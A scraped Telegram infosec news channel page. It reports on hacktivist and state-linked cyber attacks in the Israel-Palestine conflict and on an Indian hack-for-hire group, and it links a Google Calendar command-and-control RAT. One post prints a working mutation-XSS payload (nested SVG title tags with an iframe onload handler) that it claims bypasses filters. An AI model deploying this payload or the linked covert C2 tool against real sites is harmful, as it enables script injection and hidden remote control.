cKure Red
2.39K subscribers
70 photos
34 videos
21 files
449 links
The director's cut on critical feeds from InfoSec world 🌎

Main Channel: @cKure

☕️ or queries email us
📨 i@ckure.org
Download Telegram
Media is too big
VIEW IN TELEGRAM
Israel-Palestine Cyber-War update!

🇮🇷🇮🇱 The Iranian hacker group "Moses Staff" has released a video in which they demonstrated the hacking of surveillance cameras positioned above the Mossad headquarters and the 8200 Unit of Aman (Israeli electronic intelligence unit) headquarters.

The message from the Iranian hackers states: "We have been instructed to remain silent, but we are prepared and armed. We await orders from our leader."
Media is too big
VIEW IN TELEGRAM
Cyber-Attack amid Israel-Palestine Cyber-War: Iranian state sponsored (as per Israeli sources) threat actor has allegedly compromised a data center pertaining to Israel with over 30TB of Data being wiped off in the attack.

The video was shared by the threat actor with technical detail.

Furthermore, a message was shared alongside the video PoC;
Thenceforth,you will suffer irreparable damage,We will punish you...
Also we destroyed more than 30 TB of data from different servers



מעתה תסבלו נזקים בלתי הפיך
אנחנו נעניש אתכם
במתקפה זו הרסנו יותר מ-30 טרה בייט של נתונים משרתים שונים
Media is too big
VIEW IN TELEGRAM
Reattaching video due to format issues (apparently).
GCR - Google Calendar RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel (but some friends would say it cannot be :) very thanks to my mates "Tortellini"
https://aptw.tf)

https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Zero-Day: Universal MXSS.

Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.

<svg>
<title>
<title>
<image href="</title><iframe onload=alert(1)>">
</title>
</title>
</svg>
This media is not supported in your browser
VIEW IN TELEGRAM
Anonymous (Hacktivist group) sends a message to the Israeli leader and government amid ongoing attack on children of Palestine.

Story; part of Israel-Palestine Cyber-War.

https://youtu.be/BGcHzs9LKQE
Top_C_C_Methods_1699929574.pdf
8.1 MB
Command and control methods with details.
cKure Red pinned a file
An Indian hack-for-hire group targeted the United States, China, Myanmar, Pakistan, Kuwait, and other countries as part of a wide-ranging espionage, surveillance, and disruptive operation for over a decade.

The Appin Software Security (aka Appin Security Group), according to an in-depth analysis from SentinelOne, began as an educational startup offering offensive security training programs, while carrying out covert hacking operations since at least 2009.

https://thehackernews.com/2023/11/indian-hack-for-hire-group-targeted-us.html

https://thehackernews.com/2013/05/first-large-cyber-espionage-activity.html
ISRAEL GAZA CONFLICT THE CYBER PERSPECTIVE.pdf
1.8 MB
Documentation of cyber activity amid the Israel Palestine war.
Shadowy hacking group targeting Israel shows outsized capabilities. Islarel Palestine conflict.

A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.

https://cyberscoop.com/hacking-israel-wild-card/
Indian government asks Reuters news agency 📰 to take down an article titled "How an Indian startup hacked the world 🌍"

Reuters had published the article and removed it after the Indian court order.

Reuters released the details about this: https://www.reuters.com/investigates/special-report/usa-hackers-appin/

It is likely that the article mentioned criminal activity by the startup that involved people in power and access.